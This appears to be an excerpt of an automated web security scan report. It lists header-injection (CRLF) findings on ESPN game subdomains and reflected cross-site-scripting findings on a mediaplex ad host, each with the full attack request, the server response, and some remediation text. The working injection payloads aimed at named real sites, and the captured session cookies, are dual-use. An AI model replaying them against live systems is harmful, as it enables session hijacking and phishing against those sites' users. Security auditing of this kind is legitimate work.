GET /pokerpickem/f3394%0d%0a260e20407d2/frontpage HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 201 Content-Type: text/html; charset=iso-8859-1 Location: /pokerpickem/en/f3394 260e20407d2/frontpage Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/f3394 260e20407d2/frontpage">/pokerpickem/en/f3394 260e20407d2/frontpage</A>.<BODY></HTML ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 4ec69%0d%0a484c4d23469 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /pokerpickem/4ec69%0d%0a484c4d23469/group HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 193 Content-Type: text/html; charset=iso-8859-1 Location: /pokerpickem/en/4ec69 484c4d23469/group Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/4ec69 484c4d23469/group">/pokerpickem/en/4ec69 484c4d23469/group</A>.<BODY></HTML>
The value of REST URL parameter 2 is copied into the Location response header. The payload a807e%0d%0a898e11a593d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /pokerpickem/a807e%0d%0a898e11a593d/story HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 193 Content-Type: text/html; charset=iso-8859-1 Location: /pokerpickem/en/a807e 898e11a593d/story Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/a807e 898e11a593d/story">/pokerpickem/en/a807e 898e11a593d/story</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload db6fa%0d%0a57ddd8e895b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /db6fa%0d%0a57ddd8e895b HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 157 Content-Type: text/html; charset=iso-8859-1 Location: /en/db6fa 57ddd8e895b Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/db6fa 57ddd8e895b">/en/db6fa 57ddd8e895b</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 31be1%0d%0a5bb07d47379 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /31be1%0d%0a5bb07d47379/ HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 159 Content-Type: text/html; charset=iso-8859-1 Location: /en/31be1 5bb07d47379/ Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/31be1 5bb07d47379/">/en/31be1 5bb07d47379/</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 1babd%0d%0a818dc4039b8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1babd%0d%0a818dc4039b8/conversation HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 183 Content-Type: text/html; charset=iso-8859-1 Location: /en/1babd 818dc4039b8/conversation Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/1babd 818dc4039b8/conversation">/en/1babd 818dc4039b8/conversation</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 6d6b6%0d%0a1e751f105f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6d6b6%0d%0a1e751f105f3/createOrUpdateEntry HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 197 Content-Type: text/html; charset=iso-8859-1 Location: /en/6d6b6 1e751f105f3/createOrUpdateEntry Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/6d6b6 1e751f105f3/createOrUpdateEntry">/en/6d6b6 1e751f105f3/createOrUpdateEntry</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 60040%0d%0a06f626c9e72 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /60040%0d%0a06f626c9e72/entry HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 169 Content-Type: text/html; charset=iso-8859-1 Location: /en/60040 06f626c9e72/entry Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/60040 06f626c9e72/entry">/en/60040 06f626c9e72/entry</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 63b5f%0d%0acf2b0e791bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /63b5f%0d%0acf2b0e791bb/entryStats HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 179 Content-Type: text/html; charset=iso-8859-1 Location: /en/63b5f cf2b0e791bb/entryStats Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/63b5f cf2b0e791bb/entryStats">/en/63b5f cf2b0e791bb/entryStats</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 7b78a%0d%0a54f670ab62 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7b78a%0d%0a54f670ab62/story HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 167 Content-Type: text/html; charset=iso-8859-1 Location: /en/7b78a 54f670ab62/story Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/7b78a 54f670ab62/story">/en/7b78a 54f670ab62/story</A>.<BODY></HTML>
The value of the object_id request parameter is copied into the Location response header. The payload 3ca92%0d%0a5d6cccec3bc was submitted in the object_id parameter. This caused a response containing an injected HTTP header.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="/ci/content/submit/comm ...[SNIP]...
5. Cross-site scripting (reflected)previousnext There are 182 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
5.1. http://altfarm.mediaplex.com/ad/fm/12760-79049-1577-0 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://altfarm.mediaplex.com
Path:
/ad/fm/12760-79049-1577-0
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64aee"><script>alert(1)</script>573b308cfb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad/fm/12760-79049-1577-0?64aee"><script>alert(1)</script>573b308cfb8=1 HTTP/1.1 Host: altfarm.mediaplex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: svid=OPT-OUT;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-cache Content-Type: text/html Content-Length: 302 Date: Sun, 07 Nov 2010 01:11:40 GMT
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e172c"><script>alert(1)</script>f7756b7702 was submitted in the REST URL parameter 1. This input was echoed as e172c"><script>alert(1)</script>f7756b7702 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
